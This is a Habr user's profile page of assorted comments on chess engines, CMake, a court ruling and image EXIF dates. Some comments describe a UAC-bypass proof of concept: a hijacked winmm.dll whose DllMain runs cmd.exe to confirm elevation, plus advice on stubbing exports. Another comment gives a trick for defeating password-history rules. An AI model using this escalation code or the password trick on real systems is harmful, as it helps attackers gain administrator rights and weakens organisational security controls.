Pull to refresh
27
0
Михаил Куликов @shukan

Пользователь

Send message

Есть ФКН токены, с криптографией на борту - из них нельзя извлечь. А есть более дешевые, которые представляют из себя как бы флешку с пин-кодом, из них можно извлечь всегда, если знать пин-код.
Подробнее см, например, здесь - https://habr.com/ru/post/306034/

да что-то есть!
Заголовок спойлера
nt\Win2K3\shell\osshell\accesory\wordpad\
  26.02.2003│        39118│R  A      │wordpad.cpp
  26.02.2003│         5412│R  A      │wordpad.h
  26.02.2003│          717│R  A      │wordpad.manifest
  26.02.2003│        41836│R  A      │wordpad.rc

Всё отлично, только дату лучше брать из Exif.Image.DateTime

from PIL import Image
def get_date_taken(path):
    return Image.open(path)._getexif()[36867]
Да уж, закошмарили Вы дальнобоя по полной программе! Я правильно понимаю, что кражи не было, что телефон лежал в снегу? Тогда тот, кто нашел телефон и не отдал находку в органы — он лишается право на вознаграждение и всё, уголовной ответственности за это нет.

Есть гражданско-правовые отношения. Вам следовало бы подать гражданский иск об истребовании своего имущества из чужого незаконного владения в порядке ст.301 ГК РФ. А обвиняемому в итоге что вменили? Кражу?

Так кражи же нет, взял в снегу и пошёл. А вдруг это Вы не случайно потеряли, а специально выбросили телефон. И что теперь, ему там миллион лет лежать? А если бы дворник в мусорку выкинул — дворника за кражу и за уничтожение чужого имущества привлекать?

Судебная практика ниже. Сколько времени кстати прошло? Если не истек срок давности, то я бы на Вашем месте ожидал нового судебного разбирательства, теперь уже с полным снятием обвинения и с реабилитацией обвиняемого. Хотя, думается мне, что судья и так его не привлекла за примирением сторон.

Заголовок спойлера
ПРЕЗИДИУМ МОСКОВСКОГО ГОРОДСКОГО СУДА ПОСТАНОВЛЕНИЕ от 26 апреля 2013 г. по делу N 44у-104/13 Вместе с тем, из исследованных судом доказательств видно, что Б. никаких активных действий по изъятию и неправомерному завладению принадлежащим Е. мобильным телефоном не предпринималось, на момент обнаружения им телефона имущество выбыло из владения потерпевшей без участия Б. и помимо его воли, то есть без целенаправленных активных его действий. Пояснения же потерпевшей о том, что она телефон оставила на подоконнике и намеревалась через полтора часа забрать в том же месте, полагая, что в "..." его никто не присвоит, не могут рассматриваться как свидетельство умысла Б. на совершение кражи. Более того, обстоятельства обнаружения Б. дорогостоящего мобильного телефона, который более часа находился в общедоступном месте в отсутствии собственника, не дают оснований для однозначного вывода о том, что собственником имущество не было потеряно, и собственник помнит, в каком именно месте произошла пропажа. Учитывая изложенное, Президиум Московского городского суда полагает, что бесспорные доказательства наличия умысла Б. на совершение кражи чужого имущества по делу отсутствуют. В соответствии со ст. 227 ГК РФ Б., обнаружив указанный мобильный телефон, должен был сообщить о находке или сдать ее в полицию или орган местного самоуправления. Однако, то, что он этого не сделал, не является основанием для привлечения его к уголовной ответственности, поскольку согласно п. 2 ст. 229 ГК РФ, за невыполнение указанных гражданско-правовых обязанностей он только лишается права на вознаграждение. Эти обстоятельства и приведенное выше положение закона судом при постановлении приговора и судом апелляционной инстанции во внимание приняты не были, и указанные существенные нарушения уголовного закона (его неправильное применение) и уголовно-процессуального закона повлияли на исход дела. Исходя из изложенного, Президиум Московского городского суда находит состоявшиеся судебные решения подлежащими отмене, а уголовное дело в отношении Б. — прекращению, за отсутствием в его действиях состава преступления, с признанием за ним права на реабилитацию.

Подробнее на Правовед.ru: pravoved.ru/question/1572567
Судя по цвету это Process Explorer от Руссиновича.

Судя по уязвимости — то Вы открываете специально подготовленный (вирусный ) текстовый файл и при этом без Вашего участия запускается cmd.exe

А теоретически, если там переполнение памяти (буфера), то можно что угодно запустить. Я лично один раз так попал, когда открыл вирусный PDF файл — при этом запустился дроппер, дроппер скачал малварь, малварь села в реестр, в итоге закончилось восстановлением винды из бэкапа, потому что ни один антивирус не увидел малварь, настолько она была свежей.
> За последний год у меня запрашивали его скан или ксерокопию не менее десяти раз.

А если им передавать «утерянный» паспорт? Раз незаконно требуют снять скан — получают незаконный скан. Всё ровно.
Я вижу единственный выход. После того как в Банке сняли скан Вашего паспорта — нужно заявить в УФМС, что паспорт утерян и получать новый. В УЦ скорее всего проверят скан паспорта по базе действительных паспортов МВД и откажут в выдаче сертификата ЭП. Другими словами в нынешней реалии если сняли скан Вашего паспорта — это приравнивается к его утере! Остаётся вопрос какой регламент УЦ и проверяют ли они данные паспорта на недействительность?
Представьте себе, я давно уже через Стокфиш прогоняю свой любимый «Международный турнир гроссмейстеров», это книга Д.И.Бронштейна — так там ошибка на ошибке! Гроссмейстеры после очередного тура собрались, проанализировали игру, вынесли вердикт, а Стокфиш не согласен. Да ещё как не согласен! И всего-то после минутного анализа. Пора переиздавать книгу под названием «Стокфиш против Бронштейна».
Заголовок спойлера
image
Да, нашёл партию, спасибо!

Но даже если скушать пешку, Стокфиш продолжает показывать 0.0, а в вашем случае Крd1?? была серьёзная ошибка, там уже написали. Она позволила пойти f5! со всеми вытекающими.

Но вы же сами пишете в статье замечательные слова —
Компьютер всегда ожидает сильнейший с его точки зрения ход. Он не ставит некорректные ловушки, в расчете на то, что противник не заметит комбинацию или атаку. Люди делают это постоянно.
Здесь Мираж, похоже, сыграл как человек и подловил на некорректную ловушку. Тем и выиграл. Стокфиш же показывает как оно есть. А оно есть +2.75 после c4-c3. А это практически гарантированный выигрыш за белых, чёрным ничего не светит.
Можете попробовать скормить это современным программам

Скормил Стокфишу. Сильнейший ход чёрных c4-c3. Но это их не спасает.
Если белым взять пешку, то равенство 0.0, но они могут пойти b2-b4,
тогда оценка 2.75 — здесь черным придется несладко, почти фигуру сливают.
Весь анализ занял около 10 секунд.

Заголовок спойлера


И дальше я уже догнал до мата лучшими ходами Стокфиша.
Чёрные получают мат, какой здесь Выигрыш?
Приведите, пожалуйста, PGN — как у вас закончилась партия?
У меня получилось так:

Заголовок спойлера
1.… c3 2. b4 Bb5 3. Rff2 Rbc8 4. Nh6 Rc4 5. Nxf7+ Rxf7 6. Qxf7 Qg5+ 7. Kb1 Rxb4+ 8. axb4 Qg1+ 9. Rf1 Qxf1+ 10. Qxf1 Bxf1 11. Rh6 g5 12. Rxe6 Kxh7 13. Rf6 Bb5 14. Ka2 Bc4+ 15. Ka3 Kg7 16. Rf5 Kg6 17. Rf2 g4 18. e6 d4 19. e7 Bf7 20. Rf4 g3 21. Rxd4 Kf6 22. Rg4 Kxe7 23. Rxg3 Bh5 24. Rxc3 Kd6 25. Ka4 Be2 26. Rc5 Kd7 27. c3 Bf3 28. Ka5 Be2 29. c4 Kd8 30. Kxa6 Kd7 31. b5 Kd6 32. Rc6+ Ke7 33. b6 Kd7 34. Rc7+ Kd6 35. Rc8 Bf3 36. b7 Bxb7+ 37. Kxb7 Ke6 38. c5 Kf7 39. c6 Ke6 40. c7 Kf7 41. Rd8 Ke6 42. c8=Q+ Ke5 43. Qc5+ Kf4 44. Rd4+ Kg3 45. Qc3+ Kf2 46. Rd2+ Kg1 47. Qa1#

Хотя нужно отдать должное, почти все ходы были единственными!
То есть первая линия держала накал борьбы от +3 до +5.
А вторая линия Стокфиша уже 0 или даже выигрыш за чёрных.
SHARED помогло, спасибо!

А я test_grasshoper долго мучал, а надо было add_library.
Подскажите пожалуйста, как нужно прописать, чтобы в vcxproj попадал .lib файл, а не .dll файл?

Имеем проект отсюда github.com/gost-engine/engine пробуем его собрать.

Имеем запись в CMakeLists.txt следующего вида:

add_executable(test_grasshopper test_grasshopper.c)
target_link_libraries(test_grasshopper gost_engine gost_core ${OPENSSL_CRYPTO_LIBRARY})
add_test(NAME grasshopper
COMMAND test_grasshopper)

А ниже описание для gost.dll (и gost.lib наверное, тоже, я не очень понимаю, что это задает, если честно):

add_library(gost_engine MODULE ${GOST_ENGINE_SOURCE_FILES})
set_target_properties(gost_engine PROPERTIES PREFIX "" OUTPUT_NAME "gost")
target_link_libraries(gost_engine gost_core ${OPENSSL_CRYPTO_LIBRARY})

В итоге вызов: cmake -DCMAKE_BUILD_TYPE=Release ..
приводит к тому что в файле test_grasshopper.vcxproj получаем для AdditionalDependencies:
bin\Release\gost.dll;Release\gost_core.lib;...

А надо .lib вместо .dll иначе в Visual Studio не собирается, надо так (прописываю ручками):
Release\gost.lib;Release\gost_core.lib;...

Уже всю голову себе сломал, что же такого поменять в настройках для test_grasshoper
кстати, версия с экспортом всех функций опробована на Windows 7, 8.1, 10 — работает везде
Зачем проксирующую? Можно сделать
dumpbin winmm.dll /exports

и далее все 180 функций оформить как пустые
void CloseDriver(void) {}
void DefDriverProc(void) {}
void DriverCallback(void) {}
void DrvGetModuleHandle(void) {}
void GetDriverModuleHandle(void) {}
void OpenDriver(void) {}
...

этого будет достаточно, чтобы winmm.dll подгрузилась в адресное пространство, ну а после загрузки, вызываем что нам надо и сразу делаем exit(0) см код для DllMain в сообщении выше — это я к тому, что функционал проксирования нам неинтересен, достаточно только загрузки с нужными правами
Проделал всё точно как в статье и заработало!
Не работает, только если перевести полозок UAC в самый верх.
По умолчанию он стоит на 3ем делении на котором UAC обходится.
Заголовок спойлера


Проделал при неизменной WinSAT и на своей winmm.dll
(с сохранением таблицы экспорта конечно же, иначе exe не загрузится)
В своей DLL написал
#include <windows.h>
int DllMain(void* hInst,int dwReason,void* lpReserved)
{
   WinExec("cmd.exe /c reg query HKU\\S-1-5-19 > %temp%\\test.txt", 1);
   exit(0);
}

И получил в TEMP файл test.txt что говорит о том, что UAC пройден
HKEY_USERS\S-1-5-19\AppEvents
HKEY_USERS\S-1-5-19\Console
HKEY_USERS\S-1-5-19\Control Panel
HKEY_USERS\S-1-5-19\Environment
HKEY_USERS\S-1-5-19\EUDC
HKEY_USERS\S-1-5-19\Keyboard Layout
HKEY_USERS\S-1-5-19\Software
HKEY_USERS\S-1-5-19\System

SID: S-1-5-19
Название: Администратор NT
Описание: Локальная служба
Не работает этот POC — winmm.dll грузится из доверенного каталога, а не из нашего
Пруф (результат listdll.exe)
Заголовок спойлера
— WinSAT.exe pid: 17480
Command line: «C:\Windows \System32\WinSAT.exe» formal

Base Size Path
0x0000000092270000 0x2c5000 C:\Windows \System32\WinSAT.exe
0x00000000e0e30000 0x1e0000 C:\WINDOWS\SYSTEM32\ntdll.dll
0x00000000df1a0000 0xae000 C:\WINDOWS\System32\KERNEL32.DLL
0x00000000dda70000 0x266000 C:\WINDOWS\System32\KERNELBASE.dll
0x00000000deda0000 0xa1000 C:\WINDOWS\System32\ADVAPI32.dll
0x00000000e0d30000 0x9d000 C:\WINDOWS\System32\msvcrt.dll
0x00000000de8f0000 0x5b000 C:\WINDOWS\System32\sechost.dll
0x00000000de330000 0x11f000 C:\WINDOWS\System32\RPCRT4.dll
0x00000000e0be0000 0xc5000 C:\WINDOWS\System32\OLEAUT32.dll
0x00000000dd230000 0x9b000 C:\WINDOWS\System32\msvcp_win.dll
0x00000000dde30000 0xf6000 C:\WINDOWS\System32\ucrtbase.dll
0x00000000de450000 0x308000 C:\WINDOWS\System32\combase.dll
0x00000000ddd00000 0x72000 C:\WINDOWS\System32\bcryptPrimitives.dll
0x00000000df050000 0x149000 C:\WINDOWS\System32\ole32.dll
0x00000000de300000 0x28000 C:\WINDOWS\System32\GDI32.dll
0x00000000ddf90000 0x193000 C:\WINDOWS\System32\gdi32full.dll
0x00000000de760000 0x18f000 C:\WINDOWS\System32\USER32.dll
0x00000000ddce0000 0x20000 C:\WINDOWS\System32\win32u.dll
0x00000000df300000 0x1436000 C:\WINDOWS\System32\SHELL32.dll
0x00000000dda20000 0x4a000 C:\WINDOWS\System32\cfgmgr32.dll
0x00000000d1af0000 0xa000 C:\WINDOWS\SYSTEM32\VERSION.dll
0x00000000df250000 0xa6000 C:\WINDOWS\System32\shcore.dll
0x00000000db000000 0x23000 C:\WINDOWS\SYSTEM32\WINMM.dll

А вот сам exe файл, как ни странно, стартует из нашего.
Но я попробовал WinSAT.exe поменять (всего пару байт).
И вот что получилось:
Скрытый текст


Так что UAC жив. Автор, пиши ещё.
> Как вы придумываете новые пароли для входа в систему?
Замечено, что Windows (или LDAP или кто там не знаю) хранит 6 последних паролей.
Я меняю 6 раз на случайный (лучше записать на бумажке, чтоб не ошибиться)
А на 7ой раз восстанавливаю свой старый добрый пароль.
Мне сорок лет послезавтра
Есть такие, но заменив всего 1 пиксель, можно превратить любое фото в лошадь.

Думаю, тут речь идет о простом хеше изображения. Например, некто знает, что у партнера остались 10 его фото, а у него на телефоне есть 10 точно таких же фото. Далее отсылаем эти фото в фасебук, на них считается хеш и этот хеш ставится в стоп-лист. Только зачем требуют присылать фото, а не сам хеш? Хотя тут могут защищаться от того, что злоумышленники пришлют хеш фото Трампа и пострадает передовица Нью-Йорк Таймс, которая окажется заблокированной.
Кто бы еще смог понять, что здесь происходит —
Эвклид без Эвклида ?
Понятно, что здесь происходит вычисление обратного числа, Y = X^-1
Но почему именно так? Я хотел было призвать алгоритм Эвклида, но наткнулся на это!
И почему для 64х бит достаточно всего лишь одной лишней итерации?
И что за странный комментарий 3 bits correct? Это потому что odd?

// modular inverse of odd 32-bit value
uint32_t modinv32( uint32_t x ) {
        uint32_t y = x;      // 3 bits correct
        y *= 2 - x * y; // 6
        y *= 2 - x * y; // 12
        y *= 2 - x * y; // 24
        y *= 2 - x * y; // 32
        return y;
}

// modular inverse of odd 64-bit value
uint64_t modinv64( uint64_t x ) {
        uint64_t y = modinv32( (uint32_t) x );
        y *= 2 - x * y;
        return y;
}



1

Information

Rating
Does not participate
Works in
Registered
Activity